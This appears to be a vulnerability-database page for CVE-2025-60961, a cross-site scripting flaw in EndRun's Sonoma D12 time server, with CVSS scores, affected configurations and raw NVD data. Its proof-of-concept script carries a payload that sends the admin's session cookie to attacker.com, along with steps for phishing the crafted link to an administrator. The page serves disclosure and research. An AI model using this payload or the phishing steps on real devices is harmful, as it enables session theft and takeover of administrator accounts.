Security Vulnerability Report
中文
CVE-2025-60961 CVSS 6.1 MEDIUM

CVE-2025-60961

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:35:45

Description

Cross Site Scripting (XSS) vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information, and possibly other unspecified impacts.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Technologies Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60961 - Sonoma D12 XSS PoC # Vulnerability: Reflected/Stored Cross-Site Scripting in Web Management Interface # Affected: EndRun Technologies Sonoma D12 Network Time Server # Firmware: F/W 6010-0071-000 Ver 4.00 import requests TARGET_URL = "http://<target-ip>/" # Replace with the actual vulnerable endpoint discovered during testing VULNERABLE_ENDPOINT = "<vulnerable_page>" # Malicious JavaScript payload to steal admin session cookie PAYLOAD = '<script>document.location="http://attacker.com/steal?cookie="+document.cookie;</script>' def exploit_xss(): """ Exploit the XSS vulnerability by injecting malicious script through the vulnerable parameter in the web interface. """ # Construct the malicious URL malicious_url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?param={PAYLOAD}" print(f"[+] Crafted malicious URL: {malicious_url}") print("[+] Send this URL to the admin via phishing or social engineering") print("[+] When admin clicks, the script executes and steals the session cookie") # Verify the endpoint is reachable try: response = requests.get(TARGET_URL, timeout=5) print(f"[+] Target reachable, status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Target unreachable: {e}") if __name__ == "__main__": exploit_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60961", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:06.960", "lastModified": "2025-10-10T16:35:44.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (XSS) vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information, and possibly other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}